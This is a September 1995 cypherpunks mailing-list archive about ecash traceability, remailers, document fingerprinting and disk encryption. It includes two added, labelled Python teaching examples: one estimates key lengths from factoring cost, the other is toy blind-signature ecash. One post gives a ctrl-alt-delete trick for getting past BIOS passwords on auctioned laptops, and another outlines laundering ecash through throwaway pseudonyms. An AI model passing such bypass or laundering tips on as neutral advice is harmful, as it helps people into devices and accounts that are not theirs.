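Schneier's recommendations rest on three quantities: an attacker's MIPS-years budget, its tenfold growth every five years, and factoring cost that grows at number-field-sieve speed. The Python below is an added example, not Schneier's own calculation or data: it models factoring cost with the L[1/3, c] running-time form of the number field sieve (c = (32/9)^(1/3) for the special sieve, the speed the article says it assumes), calibrates the curve at one constructed reference point taken from the article (512 bits, about a year on an 1800-node Paragon, roughly 56,000 MIPS-years), and picks the smallest key length whose cost still exceeds each attacker class's budget at the end of the key's lifetime.

```python
"""Key-length budgeting against a growing factoring adversary.

Assumptions (this example's, not the article's figures):
  * factoring work follows the number field sieve form
        L(n) = exp(c * (ln n)^(1/3) * (ln ln n)^(2/3)),
    with c = (32/9)^(1/3) for the special NFS, as the article assumes;
  * one constructed calibration point: 512 bits ~ 56,000 MIPS-years
    (about a year on an 1800-node Paragon at ~31 MIPS per node);
  * an attacker's MIPS-years budget grows tenfold every five years.
"""
import math

C_SNFS = (32 / 9) ** (1 / 3)   # special number field sieve constant
C_GNFS = (64 / 9) ** (1 / 3)   # general number field sieve, for comparison

REF_BITS = 512
REF_MIPS_YEARS = 56_000.0      # constructed calibration point (see docstring)

# The article's three attacker classes, in MIPS-years available today.
ATTACKERS = {"individual": 1e4, "company": 1e7, "government": 1e9}


def nfs_work(bits: int, c: float = C_SNFS) -> float:
    """Unnormalised L[1/3, c] running time for a modulus of `bits` bits."""
    ln_n = bits * math.log(2)
    return math.exp(c * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3))


def mips_years_to_factor(bits: int, c: float = C_SNFS) -> float:
    """Estimated MIPS-years to factor a `bits`-bit modulus, scaled from the
    512-bit reference point along the chosen sieve's curve."""
    return REF_MIPS_YEARS * nfs_work(bits, c) / nfs_work(REF_BITS, c)


def attacker_budget(mips_years_today: float, years_ahead: float) -> float:
    """Budget `years_ahead` years from now: a factor of 10 every five years."""
    return mips_years_today * 10 ** (years_ahead / 5)


def min_key_bits(mips_years_today: float, lifetime_years: float,
                 start: int = 512, step: int = 64, limit: int = 8192):
    """Smallest key length (a multiple of `step`, at least `start`) whose
    factoring cost exceeds the attacker's budget at the END of the key's
    lifetime. Returns None if nothing up to `limit` suffices."""
    budget = attacker_budget(mips_years_today, lifetime_years)
    for bits in range(start, limit + 1, step):
        if mips_years_to_factor(bits) > budget:
            return bits
    return None


def recommendation_table(base_year: int = 1995, horizons=(0, 5, 10, 15, 20)):
    """Recommended lengths per attacker class for keys that must stay secure
    until base_year + horizon, mirroring the shape of the article's figure."""
    return {
        base_year + h: {name: min_key_bits(budget, h) for name, budget in ATTACKERS.items()}
        for h in horizons
    }


if __name__ == "__main__":
    for bits in (512, 768, 1024, 1536, 2048):
        print(f"{bits:5d} bits: ~{mips_years_to_factor(bits):.2e} MIPS-years (SNFS speed)")
    for year, row in recommendation_table().items():
        print(year, row)
```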
[Figure: "MIPS Years Needed to Factor". Two ascending curves, general number field sieve and special number field sieve. Y-axis: MIPS-years, 10^0, 10^3, 10^6, 10^9, 10^12, 10^15, 10^18, 10^21. X-axis: bits, 512, 768, 1024, 1280, 1536, 2048.]

[Figure: "Recommended Public-Key Key Lengths". Ascending bars for Individual, Company, Government. Y-axis: bits, 0, 500, 1000, 1500, 2000, 2500. X-axis: year, 1995, 2000, 2005, 2010, 2015.]

-----
Bruce Schneier is the author of Applied Cryptography (John Wiley), the second edition of which is due out in December. He can be reached on the Internet as schneier at winternet.com, or on BIX c/o editors at bix.com.
-----

From tcmay at got.net Fri Sep 15 18:20:21 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 15 Sep 95 18:20:21 PDT
Subject: why ecash is traceable
Message-ID:

At 10:49 PM 9/15/95, Nick Szabo wrote:
>Hal & Tim have made some interesting comments about payee untraceability.
>I suspect it will clarify things to point out the orthogonality in
>two of the major design choices:
>
>* Clearing: Offline vs. online
>* Settlement: Deposit to payee's account vs. sending new cash to payee
>
>Because DigiCash wants their product to have payer, but not payee, privacy,
>the current ecash(tm) software from DigiCash uses online clearing
>and deposit to payee's account, but the three other combinations are
>also quite doable if somebody wanted to implement them. The design that
>allows symmetric untraceability combines online clearing with sending new
>cash. This way the bank need not ID the payee Bob in order to credit

Thanks, Nick, for summarizing this clearly in terms of these two axes.

This symmetric untraceability is what I was getting at with my point about Bob clearing the transaction and getting back blinded cash. It's apparent that if Alice can get untraceable cash, and she tells her bank to go ahead and give the same kind of untraceable cash to Bob, then Bob can also get untraceable cash.

....

>Offline clearing requires the potential to ID the payer in
>order to punish double-spending after the fact.

Offline clearing has many hurdles to overcome, and this "True Name" (ID) issue is not very attractive. Fortunately, the vast increases in Net speeds are on the side of online clearing, even for relatively small transactions.

>Online systems without observers (such as ecash(tm)) don't
>need to worry about trying to find multiple spenders, because this is
>prevented by the online clearing. In fact, purposeful second-spending
>is used to recover from some error conditions, specifically to determine
>whether the payee in fact received the "coin" or not when there has been a
>network error in the middle of a transaction. Distinguishing between
>mistaken and fraudulent double spending is a very complex, not completely
>tractable problem, so the current ecash(tm) punts it, which is reasonable
>because it is online. An offline system would need an elaborate

Sounds pretty compelling to me to concentrate on online clearing systems....

I can imagine limited needs for offline clearing, such as road toll systems, or parking tokens, etc. The amounts of money there can be somewhat limited, and the implications of double spending revealing identity are less serious. (Though I can imagine a worrisome scenario where a highway toll system "deliberately double spends" received tokens to track motorists...there may be precautions built into such systems that I just don't know about.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From stewarts at ix.netcom.com Fri Sep 15 18:27:20 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 15 Sep 95 18:27:20 PDT
Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD
Message-ID: <199509160125.SAA26600@ix7.ix.netcom.com>

>Hmmmm... If memory serves, a year or so ago there was just such a schism
>when a prominent cypherpunk split off and formed the "cypherWONKS" list. :-)

:-) And starting a new list lets us decide on a new LOGO to replace that old tacky rose-and-bits thingy :-)

Cryptographic Professionals for Social Responsibility
Cryptographic Industry Association
National Steganography Alliance
Cryptographers for Foreign Reflexivity
Extremely Private Institute for Cryptography
NII Institute of Cryptography
American Cryptographic Legal Union
Free Banking Institute
Cryptographic Defense Taskforce
Cryptographic Organization for Privacy and Security
Entropy, Steganography, and Cryptography Research Organization for Women

(If anything, what we need is a way to separate the technical/mathematical discussions from rants like this, but any time we get the list focused on mostly technical issues, the government goes out of its way to do something egregiously stupid or offensive...)

Somewhat more seriously, though, there are times that it's useful to have a more respectable-sounding organization (or at least a letterhead...), that's open to participation by members and not just directors (which has been some people's concern about the EFF, CDT, EPIC, and maybe TAP or CPSR.) If none of those are respectable/accessible/non-socialist enough for you, and the British Cryptographic Privacy Association (or whatever their name was) can't be found or sounds too much like International Outside Agitators, and the various academic groups are too busy being academically respectable to do political agitation ("CryptoAcademics Write Papers!"), then come up with a name and a Postscript letterhead, and start an email list that you can gateway to cypherpunks (as long as you can prevent duplications or mail-floods.) If the main goal is to have a calmer name and mostly the same activities, an alter-ego mailing list is one approach.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From nelson at crynwr.com Fri Sep 15 18:41:07 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Fri, 15 Sep 95 18:41:07 PDT
Subject: Commercial Mixmaster (was Re: Mixmaster status)
In-Reply-To: <9509151948.AA27938@cs.umass.edu>
Message-ID:

   Date: Fri, 15 Sep 1995 15:48:14 -0400 (EDT)
   From: futplex at pseudonym.com (Futplex)

   Lance Cottrell writes:
   > 4) There will always be a free version of the client with source code.

   Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do, I suspect he may not have much legal leeway in this regard.

There *will* always be a free version of the client with source code, but the proprietary improvements will probably not be merged into the free version. Lance, and only Lance, as copyright holder, has the right to publish the code under a different copyright. It's the same thing that Phil Z. did with ViacryptPGP.

--
-russ http://www.crynwr.com/~nelson
Crynwr Software | Crynwr Software sells packet driver support | PGP ok
11 Grant St. | +1 315 268 1925 (9201 FAX) | America neither a Christian,
Potsdam, NY 13676 | Jewish, Islamic, nor atheist (etc&) nation. This is good.
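The ecash exchange a few messages up (Nick Szabo's two design axes and Tim May's reply) describes online clearing with blinded cash. The Python below is an added toy that is not DigiCash's protocol or anyone's code from the thread: it implements Chaum-style blind RSA signatures on constructed, deliberately tiny Mersenne-prime parameters, shows that the bank signs a blinded value at withdrawal and never sees the coin's serial until deposit, refuses a second deposit of the same serial the moment it arrives (which is all "online clearing" needs, with no payer identity recorded), and shows the "deposit, then send new cash" settlement that lets a payee turn a received coin into a fresh, unlinkable one. The class and function names are this example's own.

```python
"""Blind-signature ecash with online clearing (added toy, not DigiCash's)."""
import random
from math import gcd

# Constructed parameters: 2^31-1 and 2^61-1 are Mersenne primes, chosen only
# so the arithmetic is obviously correct. Far too small for real use.
P = 2**31 - 1
Q = 2**61 - 1
N = P * Q
E = 65537                              # coprime to (P-1)(Q-1)
D = pow(E, -1, (P - 1) * (Q - 1))      # bank's private exponent


class Bank:
    """Online-clearing bank: signs blinded coins, refuses repeat serials."""

    def __init__(self):
        self.seen_blinded = []   # everything the bank saw at withdrawal
        self.spent = set()       # serials already cleared

    def sign_blinded(self, blinded):
        """Withdrawal: sign without learning the underlying serial."""
        self.seen_blinded.append(blinded)
        return pow(blinded, D, N)

    def deposit(self, serial, sig):
        """Clearing: True only for a valid, not-yet-spent coin."""
        if pow(sig, E, N) != serial % N:
            return False          # forged or mangled coin
        if serial in self.spent:
            return False          # second spend caught immediately
        self.spent.add(serial)
        return True


def withdraw(bank, rng):
    """Mint one coin: random serial, blinded with r, signed blind, unblinded."""
    serial = rng.randrange(2, N)
    while True:
        r = rng.randrange(2, N)
        if gcd(r, N) == 1:
            break
    blinded = (serial * pow(r, E, N)) % N
    blind_sig = bank.sign_blinded(blinded)         # = serial^D * r mod N
    sig = (blind_sig * pow(r, -1, N)) % N          # strip r: serial^D mod N
    return serial, sig


def exchange(bank, serial, sig, rng):
    """Settlement by 'sending new cash': clear the received coin and hand
    back a freshly blinded one. Returns None if the old coin does not clear."""
    if not bank.deposit(serial, sig):
        return None
    return withdraw(bank, rng)


def demo(seed=1):
    """Run the scenarios from the thread and report what happened."""
    rng = random.Random(seed)
    bank = Bank()
    serial, sig = withdraw(bank, rng)
    result = {
        "verifies": pow(sig, E, N) == serial,
        "bank_never_saw_serial": serial not in bank.seen_blinded,
        "first_deposit": bank.deposit(serial, sig),
        "second_deposit": bank.deposit(serial, sig),   # double spend
    }
    # Bob receives a second coin and converts it into new cash.
    serial2, sig2 = withdraw(bank, rng)
    fresh = exchange(bank, serial2, sig2, rng)
    result["exchange_ok"] = fresh is not None
    result["fresh_is_new"] = fresh is not None and fresh[0] != serial2
    result["fresh_valid"] = fresh is not None and bank.deposit(*fresh)
    result["old_refused"] = not bank.deposit(serial2, sig2)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-22s %s" % (key, value))
```

Note what the bank records: blinded values at withdrawal and bare serials at deposit, with nothing tying one to the other unless the withdrawer volunteers the blinding factor. That is exactly the correlation Hal's "simulated payment" point later in the thread exploits, and why Bryce's suggestion of routing a received coin through a throwaway deposit-and-withdraw step (the `exchange` function here) breaks the link.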
From klbarrus at infocom.net Fri Sep 15 19:20:13 1995
From: klbarrus at infocom.net (Karl L. Barrus)
Date: Fri, 15 Sep 95 19:20:13 PDT
Subject: Explaining Zero Knowledge to your children
Message-ID: <199509160221.VAA29670@infocom.net>

At 08:18 PM 9/14/95 +0200, you wrote:
>There is a paper about explaining Zero Knowledge methods in simple
>words. It's titled "Explaining Zero Knowledge Authentication to your
>children" or something similar.

I think you are referring to Quisquater's (sp?) explanation, which is in terms of Ali Baba and a magic cave. A functionally similar explanation is in Schneier's Applied Crypto, pp. 85-86.

--
Karl L. Barrus

From tedwards at Glue.umd.edu Fri Sep 15 19:25:22 1995
From: tedwards at Glue.umd.edu (Thomas Grant Edwards)
Date: Fri, 15 Sep 95 19:25:22 PDT
Subject: Washington D.C. Cypherpunks Meeting Cybercast
Message-ID:

Catch the WashDC Cypherpunks meeting cybercast on CU-SeeMe tomorrow, Saturday Sept. 16 starting at 3:00 PM on the www.digex.net (205.197.247.33) reflector.

CU-SeeMe software is videoconferencing for PCs and Macs and can be found at ftp.gated.cornell.edu

-Thomas

From jsimmons at goblin.punk.net Fri Sep 15 20:03:14 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Fri, 15 Sep 95 20:03:14 PDT
Subject: Quantum computing info?
Message-ID: <199509160259.TAA03727@goblin.punk.net>

Could anyone point me to information on 'quantum' computing?

--
Jeff Simmons jsimmons at goblin.punk.net

From loki at obscura.com Fri Sep 15 21:27:23 1995
From: loki at obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 21:27:23 PDT
Subject: Why ecash is traceable
Message-ID:

At 9:46 AM 9/15/95, Timothy C. May wrote:
>At 8:47 AM 9/15/95, Donald M. Kitchen wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>
>>Excellent discussion on the subject, actually. However, your idea of
>>the "first person to the bank" maintaining anonymity via remailer block
>>is flawed. First of all, if a collusion with the bank is being taken into
>>account, presumably sufficient enough resources are involved that someone
>>may try and track the reply block. Mixmaster (as your messages mentioned
>>by name) would be necessary to eliminate the chance of tracking the block
>>through combinations of replay attacks etc. (Which reminds me, has anyone
>
>Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have
>nothing against Mixmaster, but "mix" is the term Chaum invented for what we
>later started to call a "remailer."
>
>--Tim May
>

Indeed Chaum's phrase "digital mix" was the inspiration for the name Mixmaster.

-Lance

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com
"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From wilcoxb at nagina.cs.colorado.edu Fri Sep 15 21:35:39 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox)
Date: Fri, 15 Sep 95 21:35:39 PDT
Subject: Why ecash is traceable
In-Reply-To: <199509150532.WAA08865@jobe.shell.portal.com>
Message-ID: <199509160435.WAA26877@nagina.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Hal wrote:
>
> But this correlation is what makes the coin traceable. Suppose Alice is
> paying a coin to Bob via an anonymous network, and she and the bank
> are going to try to figure out who he really is. She goes through the
> payment transaction, and Bob sends his resulting data to the bank.
> Before doing so, though, Alice simulates a payment of the same coin to
> Charlie. Charlie doesn't actually have to be involved, Alice can just
> go through what she would have done if she had spent the coin elsewhere.
> The result of this simulated payment has been shared with the bank.
>
> Now, when Bob deposits his data, the bank compares it with the data
> Alice sent, the result of her simulated spending of the same coin. By
> the argument presented above, Bob's deposit will be flagged. It will
> correlate with the data Alice sent in since this will be the equivalent
> of a double-spending. So when Bob makes the deposit he can be linked to
> the specific coin payment which Alice made, and his anonymity is lost.

So Alice/TheBank are able to tell that the nym whom Alice gave the coin to is the same as the nym who deposited it. If Bob has a pseudonymous account at the bank, and it was the same pseudonymous account that he used in the transaction with Alice, then they haven't learned anything new, but if he wants to use one pseudonym when dealing with Alice and another to deposit the coin he got from her then he has problems. That's the extent of the damage, right?

Seems like it can be prevented by laundering the coin through a single pseudonym first. That is: Bob receives the coin from Alice, calling himself "CyberBob". He deposits the coin with the bank as a one-time-nym "Nym#2837004", then he has that nym withdraw the same amount of money from its account (closing out the account) and transfers it to the nym which will actually keep the money, "NormalBob". He destroys the new blinding factors after the temporary nym has withdrawn the coin, he deposits the coin with the bank as "NormalBob", and now he is in the clear. Am I missing anything?

If Bob's transaction with Alice was actually pseudonymous rather than anonymous then he can just deposit the coin using the same pseudonym and they haven't learned anything new. Once he has done that he can safely transfer the money to any other nym of his with no risk (except for traffic analysis, physical surveillance, yadda yadda yadda).

So current (DigiCash "ecash") Chaumian protocol leads to complete anonymity/pseudonymity (there oughta be a word for that. "self-nym-control"?) in the case that pseudonymous accounts are allowed at the Bank.

Now one could move this "double-blinding" (isn't that phrase already in use?) trick into the cash protocol itself, possibly gaining a performance win. DigiCash is apparently aware of this possibility, but (rightly) doesn't consider it important to develop right now.

Regards,
Bryce

signatures follow:
 + public key on keyservers /. island Life in a chaos sea
 or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFpTOfWZSllhfG25AQHndAQAuOfz4Fohl3e/4Q3eUKKY2nZNG+TdDQEN
FvW1q1KAuGTeGJoNmL6qD4xkV1wXuT7UScN/7BwU+8SsIh3B5Cb834saGsCTjNtb
8EV2zsYqzdJkJ3DuDHQw785gqrNPokug4KPP4LRMt5N+PnPRTAWnq6PRibegsg86
ypFcUOVbLTU=
=K+5k
-----END PGP SIGNATURE-----

From sameer at c2.org Fri Sep 15 21:50:58 1995
From: sameer at c2.org (sameer)
Date: Fri, 15 Sep 95 21:50:58 PDT
Subject: Why ecash is traceable
In-Reply-To: <199509160435.WAA26877@nagina.cs.colorado.edu>
Message-ID: <199509160445.VAA13597@infinity.c2.org>

This looks as though you are simulating the 'deposit-and-get-coinage-back' within a 'deposit-and-have-account-credited' system. I figure that they would make the transaction cost involved in creating an account sufficiently high that this plan would be defeated-- or they wouldn't allow pseudonymous accounts.

--
sameer Voice: 510-601-9777
Network Administrator FAX: 510-601-9734
Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From don at cs.byu.edu Fri Sep 15 21:51:32 1995
From: don at cs.byu.edu (Donald M. Kitchen)
Date: Fri, 15 Sep 95 21:51:32 PDT
Subject: Why ecash is traceable
Message-ID: <199509160450.WAA13662@bert.cs.byu.edu>

Re: ecash being non-traceable if anon accounts are allowed...

And if not, a market will probably develop to launder ecash.

Don

From wilcoxb at nagina.cs.colorado.edu Fri Sep 15 21:52:18 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox)
Date: Fri, 15 Sep 95 21:52:18 PDT
Subject: Bad sig from Cypherpunk auto-signer Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <199509150006.UAA17827@book.hks.net>
Message-ID: <199509160452.WAA27949@nagina.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Hm. Observe the bad signature from the "Cypherpunk signing agent". Sorry if I should have limited this to Lucky and the auto-signer, but I thought y'all might be interested in this as either an attack or false positive. (My bet is on the false positive, of course.)

Bryce, signatures at end

P.S. I have seen no kiddie porn of any type on the Net. Oh wait, I saw some once that advertised itself as "young girls" performing fellatio, but they looked to be adults as far as I could tell.

P.P.S. I wonder if a "pedaphile" would be a teacher fetishist? And a "pedephile"-- for feet?

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9509141640.AA30602 at zorch.w3.org>, hallam at w3.org wrote:
>We never used to see kiddie porn on the internet. The net would go ballistic if a
>picture of a teen age nude was posted. Recently there has been a flood of ha
> rd
>core paedophile material.

There have always been nude teens on the net. The kind of pictures the most casual observer can take at any Mediterranean beach at any given day in the Summer.

There is no real kiddy porn readily available on the net. I looked long and hard. It's a red herring.

ANYBODY on this list seen some real kiddy porn on the net? I am talking intercourse, etc., not scans of six year olds from the Sears catalog, or naked boys building sandcastles on the beach.

- - --
- - -- Lucky Green PGP encrypted mail preferred.
- - ---

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv
th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ
=pjLL
- -----END PGP SIGNATURE-----

signatures follow:
 + public key on keyservers /. island Life in a chaos sea
 or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFpXdfWZSllhfG25AQFDYQQAuC01Z3tVy9Eu8GIWl850AqxTcPES3yGN
TqSZ7vT5VRVKyzJCE4Jpaosx7ndaeDnD6DkCPY6AxSeMDmN+lkKT2RZT76H0Mvvx
All9WAyetrB9p7QRAk5hxdHIantRi+z3F8akQR8SN7IVmh/QSWJMk0rKJqLtcbyQ
inF14sTWjgk=
=clgc
-----END PGP SIGNATURE-----

From iagoldbe at csclub.uwaterloo.ca Fri Sep 15 21:57:41 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 15 Sep 95 21:57:41 PDT
Subject: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <43dlf6$d07@calum.csclub.uwaterloo.ca>

In article <199509160259.TAA03727 at goblin.punk.net>, Jeff Simmons wrote:
>Could anyone point me to information on 'quantum' computing?

Try http://vesta.physics.ucla.edu/~smolin/index.html.

- Ian "hoping this new mail2news gateway works in reverse as well"

From jcaldwel at iquest.net Fri Sep 15 22:30:29 1995
From: jcaldwel at iquest.net (James Caldwell)
Date: Fri, 15 Sep 95 22:30:29 PDT
Subject: Digital Fingerprinting
Message-ID:

On 12 Sep 95 at 11:27, Andrew Loewenstern wrote:
> Such technology would be very useful in business, especially the
> high-tech industry. Think of how many non-disclosure agreements
> are signed every day relating to new products developed for the
> software industry alone. Many companies are very paranoid and
> already 'fingerprint' information by using unique code-names for
> projects, for instance. i.e. the spec sheet on their new GAK
> crypto product they give to Alice may be code-named 'project foobar'
> but the one they give to Bob may be code-named 'project burris'...
> Then, when the information leaks out they check which person they
> gave the document with that code-name and they know who to sue (or
> at least not give any more trade-secrets to). It's very simplistic
> but it has been known to work in the past.
>
> Most of the real technology for doing this is much better, of
> course... However, what stops you from printing out a
> fingerprinted document and scanning it back in, for instance?

Well, there is selective wording, misspellings, punctuation and formatting. These can be corrected easily if allowed to be transported as a text or common file type.

Another way is to place the document in a PItA proprietary graphical format for transport and viewing only, stego identifier embedded if you chose *, so that every portion of the document has some identifier embedded in it. Many obvious and many devious. Electronic drawings with a harmless and useless circuit(s) added on, software with do nothing code (by design!:) ). Difficult and time consuming to do, but for megabuck items, no prob. Automated for an additional fee of course. Start a service industry for such, make money, pay me back by running a fast, reliable remailer.

Idea is to make the thief go to some major effort and if the scanning option is used to make the deletions as obvious and telling as the former identifier.

> andrew

note* Makes a neat way of putting copyright & source information in picture and sound files, somewhat useless but every trip up helps.
From wilcoxb at nagina.cs.colorado.edu Fri Sep 15 23:28:12 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Fri, 15 Sep 95 23:28:12 PDT Subject: e$: Progress and Freedom Conference this Summer In-Reply-To: Message-ID: <199509160628.AAA02261@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Also check out Progress & Freedom Foundation's WWW site. http://www.pff.org/ This is Newt Gingrich's organization by the way in case anyone didn't know that. Bryce, signatures at end rah at shipwright.com (Robert Hettinga) wrote: > > There was a pointer here to an article in the NYT or WSJ about the > conference this summer of the Progress and Freedom Foundation, with muchos > net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth, > etc.) in attendence. Topics were mostly about e$ and the > causes/consequences thereof. > > I just saw this thing on CSPAN, and I thought it was way cool. Here's how > to get it from CSPAN in case they don't run it again. > > Ask for Tape number 57759-63 > CSPAN prices their tapes by the hour, at $35/hr. This tape is $105.00 > > > CSPAN > Department 53 > Washington, DC 20055 > > In case I botched something above, or you want to put this on your favorite > book-entry transaction account ;-), CSPAN's phone number is 202-737-3220 signatures follow: + public key on keyservers /. 
island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4 iQCVAwUBMFpuW/WZSllhfG25AQEDCAQAgyG5dc4do3mer1SlremULsoyJEgq9IZe 1ICplfjoMu3mYaSX9PCkcWgoXg3FtqSf3KN6mRZiGwp0CBk1lrSC/YBzOZfG/6gJ 7QmUv2HlDVbmE/O7vX+SjXd1iNlUoymGsiKxZk/TRAZUibb/s2CHYnrGm4mxe4y6 /RBeygqWVP8= =81iV -----END PGP SIGNATURE----- From alano at teleport.com Fri Sep 15 23:45:55 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 15 Sep 95 23:45:55 PDT Subject: laptop passwords Message-ID: <199509160645.XAA29809@desiree.teleport.com> At 01:22 PM 9/15/95 -0800, you wrote: >I've got a dilema. > 2 laptops that I just purchased at a police auction have passwords, >from what I can tell they are passworded at the cmos level. I would normaly >just pull out the battery and clear the cmos but these are laptops and I'm >not to comfortable about doing that. Any ideas? > >laptop1 - Toshiba Satelite Pro T2400CT >laptop2 - Epson Action Note 500 c I am not familiar with those models, but if they work like a regular AMI bios, try hitting ctrl-alt-delete at the password prompt. On many passworded bios it will get you right past it. That will at least give you enough info to see if there is anything worth saving. (I have no problem giving out that trick since I have found most bios passwords pretty useless unless used against the most clueless of users.) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" 
| Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From alano at teleport.com Fri Sep 15 23:57:36 1995 From: alano at teleport.com (Alan Olsen) Date: Fri, 15 Sep 95 23:57:36 PDT Subject: Digital Fingerprinting Message-ID: <199509160657.XAA02345@desiree.teleport.com> At 12:28 PM 9/15/95 +5, you wrote: >Another way is to place the document in a PItA proprietary graphical >format for transport and viewing only, stego identifier imbedded if >you chose * , so that every portion of the document has some >indentifier imbedded in it. Many obvious and many devious. Electronic >drawings with a harmless and useless circuit(s) added on , software >with do nothing code (by design!:) ). Difficult and time consuming >to do, but for megabuck items, no prob. Automated for an additional >fee of course. Start a service industry for such, make money, pay me >back by running a fast, reliable remailer. I seem to remember a software piracy case from a number of years back. The case was settled by Apple showing that their code had been copied by the copyright "easteregg" hidden in the roms. Made for a quick and effective demonstration in court. (The story may be apocryphal, but it makes for an example as to how such things do have a (supposed) valid use in protecting code from being snagged by other companies.) | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" 
| Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From edgar at highnrg.sbay.org Sat Sep 16 03:19:14 1995 From: edgar at highnrg.sbay.org (Edgar Swank) Date: Sat, 16 Sep 95 03:19:14 PDT Subject: SecureDrive News - Win95 yes, Iomega zip drive no Message-ID: -----BEGIN PGP SIGNED MESSAGE----- SecureDrive Users, I have seen inquires here and received direct e-mail enquirinq about SecureDrive and WIN95, and the Iomega zip disk. I have recently heard from users that SecureDrive 1.3d does work on Windows 95, although it does force it into "DOS Compatibility Mode", which is a performance hit on disk access. I've also heard that LOGIN does not work from a WIN95 DOS window, so has to be issued outside of Windows. I haven't heard anything specific about SecureDrive 1.4, but I believe it should work the same as 1.3d on WIN95. I'm sorry to report that SecureDrive does not support the Iomega ZIP drive. I believe that's because the TSR driver supplied with the hardware does not support a DiskBIOS interface. I had thought that Secure Device, another real-time encryption system, would support this drive, since it works through a device driver mapped to a dos file. But an actual trial proved otherwise. The problem is that the DOS file must be present when the CONFIG.SYS DEVICE= statement for the SECDEV.SYS is processed. But the zip drive driver is a TSR that doesn't get loaded until after all DEVICE statements have been processed. There's no particular reason that Iomega couldn't have written their driver as an MSDOS device driver rather than a TSR, in which case SecureDevice would probably work, but they didn't, so it doesn't. Hope this info is helpful. If any of you discover any interesting new facts using SecureDrive, please let me know. Edgar W. 
Swank -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFirU94nNf3ah8DHAQEEHAQAg4IB1XDQdFIxHto1iTPpORjuubUdhRzD t8MT350E0KZVCMSj+Vh4y4wEPw2dmms/QY1iMxuwVV/lja+l9yHaRPuxpi5EjQdv Mi8Sk73M/gcL35TTjUli5dnjzHsJ6uYt5Q51j7s0EspJ1qprQlSlgmNvvOTqDgyf /he5BfEfAU4= =GXYT -----END PGP SIGNATURE----- --- edgar at HighNRG.sbay.org Keep Freestyle Alive! From aba at dcs.exeter.ac.uk Sat Sep 16 03:27:07 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sat, 16 Sep 95 03:27:07 PDT Subject: CYPHERPUNK considered harmful Message-ID: <14439.9509161026@exe.dcs.exeter.ac.uk> David Lambert writes: > > Peter Trei wrote: > > > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > > nutcases for many people, and are a barrier to getting our ideas > > across. I'm not saying this pigeonholing is correct - in fact I despise > > people who judge a book by it's cover, but so many people DO make such > > snap judgements that we need to take this into account when talking to > > the general public. > > Two of the responses to the "An opportunity..." post unapologetically > admitted that they refused to read the text of the message due to the > presence of the word "cypherpunk" in the first sentence. > > Shows you what we're up against. > > BTW, I'm not for changing the name of the list, but I do see the logic > in a more establishment-friendly name to use when lobbying the public. There is likely some truth to the cypherpunk turning some people off before they listen, but also as has already been said 'cypherpunks' has it advantages too: catchy, gets the media imagination, and has an established reputation, and set of 